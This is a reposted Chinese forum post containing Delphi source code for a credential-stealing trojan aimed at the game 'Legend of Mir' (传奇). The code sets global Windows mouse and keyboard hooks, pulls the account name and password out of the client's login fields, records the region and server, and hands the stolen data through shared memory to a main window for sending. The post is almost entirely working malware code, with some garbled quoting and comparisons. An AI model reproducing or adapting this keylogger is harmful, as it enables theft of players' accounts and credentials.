[转帖]传奇木马的主要代码

获取“传奇”密码、区域、服务器的主要代码 unit unitHook; interface …… function EnableHook:Boolean;stdcall //有效钩子程序 function DisableHook:Boolean;stdcall; //无效钩子程序 …… implementation …… //列举子窗体的回调函数 function EnumChildWindowsProc(hChild: HWnd): Boolean; stdcall; var szClassName: array[0..255] of char; begin Result := True; //设定为True才会再找下一个 GetClassName(hChild, szClassName, 255); if StrPas(szClassName)=';TEdit'; then begin inc(numEdit); if numEdit=1 then hEdit2:= hChild //密码 else if numEdit=2 then hEdit1:= hChild //账号 end; end; //取密码 procedure GetPassword; var ss,ID,PW:string; begin numEdit:=0;//识别TEdit控件数量 EnumChildWindows(hActiv, @EnumChildWindowsProc, 0);//列举控件 if numEdit=2 then begin ID:=trim(GetCaption(hEdit1)); PW:=trim(GetCaption(hEdit2)); if (ID<>';';)and(PW<>';';) then begin nNext:=3; ss:=Format(';账号=%s,密码=%s';,[ID,PW])+'; ';+FormatDateTime(';yyyy-mm-dd hh:nn:ss';,Now); StrCopy(@pShMem^.Text,PChar(ss)); PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知 end; end; end; //取服务器名 procedure GetServerName; const x1=310;x2=477; y1=144; d=3; //服务器名按钮间隔 step=42; //服务器名按钮步长 var P : TPoint; yy, n1, n2 : integer; IniFileName, Ident, ss : string; begin GetCursorPos(P); //获取当前鼠标的坐标 if (p.Xx2) or (p.Y';'; then begin ss:=ss+'; ';+FormatDateTime(';yyyy-mm-dd hh:nn:ss';,Now); StrCopy(@pShMem^.Text,PChar(';服务器=';+ss)); //PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知 PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 10, 2); //通知取信息,并反馈发送 end; end; //鼠标钩子过程，由判断鼠标的动作来决定writetotxt //参数分别是钩子代码，wParam鼠标消息号，lParam指向一个MOUSEHOOKSTRUCT （包含了有关鼠标事件的信息） function MouseHookPro(iCode:integer; wParam:wparam; lParam:lparam): LResult;stdcall;export; var hControl : HWND; WinClass, WinText, ss : string; P:TPoint; rcWin:TRect; begin if (iCode=HC_ACTION) and (wParam=WM_LBUTTONUP) then begin//如果是鼠标单击的消息 hActiv:=GetActiveWindow; WinClass:=GetClass(hActiv); if Uppercase(WinClass)=';TFRMMAIN'; then begin WinText:=GetCaption(hActiv); if WinText=';传奇客户端'; then begin hControl:=FindWindowEx(hActiv,0,';TComboBox';,nil); if hControl<>0 then begin //是区号选择窗口 GetWindowRect(hActiv,rcWin); P.X:= PMouseHookStruct(lParam)^.pt.X - rcWin.Left; P.Y:= PMouseHookStruct(lParam)^.pt.Y - rcWin.Top; if(P.X>=200)and(P.X<=280)and(P.Y>=348)and(P.Y<=380)then begin//“确认”按钮 ss:=';区号=';+GetCaption(hControl)+'; ';+FormatDateTime(';yyyy-mm-dd hh:nn:ss';,Now); StrCopy(@pShMem^.Text,PChar(ss)); PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知 end; end; end else if WinText=';legend of mir2'; then begin if nNext=3 then begin GetServerName; //取服务器名,与下段先后顺序不能颠倒 nNext:=0; end; P:=PMouseHookStruct(lParam)^.pt; if(P.X>=421)and(P.X<=501)and(P.Y>=336)and(P.Y<=371)then //[提交]按钮 GetPassword; //取密码,与上段先后顺序不能颠倒 end; end; end; Result:=CallNextHookEx(mousehook,iCode,wParam,lParam); end; //键盘hook，wParam 键ASCII码 function KeyboardHookPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export; var WinClass, WinText : string; begin if (iCode=HC_ACTION) and ((lParam and $80000000)=0) and //$80000000键盘掩码常量 (wParam=$0D) then begin //$0D回车键 hActiv:=GetActiveWindow; WinClass:=GetClass(hActiv); WinText:=GetCaption(hActiv); if (Uppercase(WinClass)=';TFRMMAIN';)and(WinText=';legend of mir2';) then begin GetPassword;//取密码 end; end; Result := CallNextHookEx(keyboardhook, iCode, wParam, lParam); end; //有效钩子程序 function EnableHook:boolean;stdcall;export; begin if mousehook=0 then mousehook:=SetWindowsHookEx(wh_mouse,MouseHookPro,HInstance,0);//鼠标钩子 if keyboardhook=0 then keyboardhook:=SetWindowsHookEx(wh_keyboard,KeyboardHookPro, hinstance,0);//键盘钩子 Result:=(mousehook<>0)and(keyboardhook<>0); end; //无效钩子程序 function DisableHook:boolean;stdcall;export; begin if mousehook<>0 then if UnHookWindowsHookEx(mousehook) then mousehook:=0;//鼠标钩子 if keyboardhook<>0 then if UnHookWindowsHookEx(keyboardhook) then keyboardhook:=0;//键盘钩子 Result:=(mousehook=0)and(keyboardhook=0); end; initialization {如果映射文件已经存在则打开} hMappingFile := OpenFileMapping(FILE_MAP_WRITE, False, MappingFileName); if hMappingFile = 0 then {创建映射文件} hMappingFile := CreateFileMapping($FFFFFFFF, nil,PAGE_READWRITE, 0, SizeOf(TShareMem), PChar(MappingFileName)); if hMappingFile <> 0 then begin {句柄pShMem指向映射文件地址} pShMem := PShareMem(MapViewOfFile(hMappingFile,FILE_MAP_WRITE,0,0,0)); if pShMem = nil then begin CloseHandle(hMappingFile); MessageBox(0,';不能建立共享内存!';,';';,0); exit; end; end; mousehook:=0; keyboardhook:=0; nNext:=0; finalization UnMapViewOfFile(pShMem); CloseHandle(hMappingFile); end.

编完.